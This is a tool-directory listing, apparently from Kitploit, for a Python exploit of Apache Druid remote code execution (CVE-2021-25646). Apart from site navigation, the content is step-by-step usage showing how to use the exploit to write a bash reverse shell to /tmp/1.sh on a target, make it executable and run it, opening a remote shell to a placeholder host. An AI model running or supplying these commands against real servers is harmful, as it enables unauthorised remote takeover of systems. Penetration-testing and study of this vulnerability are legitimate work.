Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-25646 — Python exploit for Apache Druid remote code execution (CVE-2021-25646) with reverse shell and command execution capabilities. | Kitploit
Tools/GitHubGitHub/gps1949/cve-2021-25646
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubgps1949/cve-2021-25646

CVE-2021-25646

Python exploit for Apache Druid remote code execution (CVE-2021-25646) with reverse shell and command execution capabilities.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

usage: python3 CVE-2021-25646.py -u http://x.x.x.x -c cmd

Reverse shell as follows:

Write reverse shell script

python3 CVE-2021-25646.py -u http://x.x.x.x -c "echo 'bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1' > /tmp/1.sh"

Grant execution permission to the shell script

python3 CVE-2021-25646.py -u http://x.x.x.x -c "chmod +x /tmp/1.sh"

Execute the shell

python3 CVE-2021-25646.py -u http://x.x.x.x -c "/bin/bash /tmp/1.sh"

Download Tool